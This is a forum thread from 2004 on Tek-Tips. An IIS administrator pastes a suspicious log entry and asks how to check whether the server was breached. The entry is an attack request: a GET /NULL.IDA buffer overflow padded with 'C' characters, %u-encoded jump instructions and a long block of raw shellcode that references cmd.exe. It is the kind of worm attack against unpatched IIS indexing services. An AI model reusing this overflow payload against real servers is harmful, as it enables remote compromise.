Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

Register Log in
  • Congratulations strongm on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

Security Breach?

Status
Not open for further replies.
JabbaTheNut

JabbaTheNut

Programmer
Jul 29, 2002
176
US
I found the following entry in my IIS logs. I immediately updated my server with the latest patches through windowsupdate.com. However, I am afraid there may have been a security breach. Any suggestions on how I can investigate?

2004-01-16 14:21:09 64.x.x.x - 192.x.x.x 80 GET /NULL.IDA
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%
ub890%udacf%u77ee%u0000%u0000%u838b%u0094%u0000%u408b%u0564%
u0150%u0000%ue0ff%
u9090=x&ë+_됐èõÿÿÿoð
}-‹÷f¸H3Éf‹È´™ü¬2Īâú$쟙™eªP(¹)
½k7_Þf™q”™™q™™q×›™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™
™qæ›™™Òœ™™qÇ™™™q™™™a™íyÒœ™™Éf+”Ÿ™™Þœ™™Éf+”Ÿ™™¶œ™™É
f+œ™™¢œ™™Éf+œ™™!™™™™ÉÖœ™™Éf+\œ™™!
™™™™Éf+Oœ™™ZÒœ™™ó™ó€š˜™™ÉÒœ™™Éf+šŸ™™Z”“Îð÷÷íØìíöØííøúò
¹Ï«©”“”“ñ+™™™f+&œ™™¶œ™™q_™™™af–
/™™™a™íÎ++++󙦜™™Éñ™™™Úœ™™É¶œ™™Éf+/œ™™a™–
™™™ó™¦œ™™ÉÚœ™™ÉÒœ™™Éf+šŸ™™afíý++++ró™ñ™™™Úœ™™É
Òœ™™Éf+‘Ÿ™™a™í§++++afí¬++++ªBʦœ™™ÊÉÚœ™™É¢
œ™™Éf+5œ™™a™í++++p²fffªYÑZªYZªBʽ›™™ÊªBÊÊÊÉf++œ™™a™í’++
++½›™™Z!
ffffZ™™™™Úœ™™^™Ý™™™Éf+þœ™™Úœ™™ªœ™™ÚÙÚ¥®œ™™Ú¡!
˜˜™™ÚµÊʪYÉÉÉÙÉÑÉÉ쟙™ÉªYÉf+™ªœ™™Éf+œ™™®œ™™Éf+œ™
™Úœ™™™Zñ™™™óÙf+9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf+Åœ™™
ªYÉw›™™É¢œ™™É®œ™™Éf+Åœ™™Z™™™™™™™™˜™™™É¸š™™^š‰
™™™Ê۝™™ÊÉf+eœ™™Aa™ÁåEZZ‰
™™™óŠöš™™Éf+½Ÿ™™öš™™Éf+©Ÿ™™a™í»++++é•ge4a™íŠ++++™¥“
íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™Éó›f+€Ÿ™™ó™ó˜ó›f+
pœ™™af–
™™™Þœ™™¦œ™™^š˜™™™óÊóñff™™Éf+§Ÿ™™a™ìé++++ÿöŸ™™ÿÝ
™™蟙™ߝ™™afì–++++q³fffߝ™™Þœ™™ó‰
۝™™ÊÉf+iœ™™a™ìº++++óœÞœ™™Éf+lœ™™a™ì’++++Þœ™™ZªYZ›™™
ú™™™™™™™™™™™™!
™™hî¡ÔÃ+™íž++++ÑrhA꥚jïášj繚b׍ªKÏÎȦšb,ÁŸ™™ªP
(žjÿ>í•++++ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…
šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™þŸ™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHe
k7Á¦™íŽ++++ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉf
ŽÆZ™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™Þ
üíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™Þõöû
øõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý
™™Îʫƪ«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüêöúòüí™ÎÊØ
Êíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòöéí™™™ÕöøýÕðûëøëàØ™
ÞüíÉëöúØýýëüêê™êëî¨éî™úؾÌUcmd.exe$ 200 -


Game Over, Man!
 
Sort by date Sort by votes
Status
Not open for further replies.

Similar threads

amanua
  • Locked
  • Question
Event ID 4776 Security Log
Replies
0
Views
92
amanua
amanua
Bigbadjoe
  • Locked
  • Question
Issue with Security sharing folder on Server 2012.
Replies
0
Views
53
Bigbadjoe
Bigbadjoe
Bigbadjoe
  • Locked
  • Question
Issue with Security sharing folder on Server 2008
Replies
1
Views
62
wtotten
wtotten
intel233
  • Locked
  • Question
Export Security Group Info
Replies
1
Views
138
intel233
intel233
bmacbmac
  • Locked
  • Question
How to open ports with firewall off - Recent security update may have closed necessary port
Replies
3
Views
80
smah
smah

Part and Inventory Search

Sponsor

Back
Top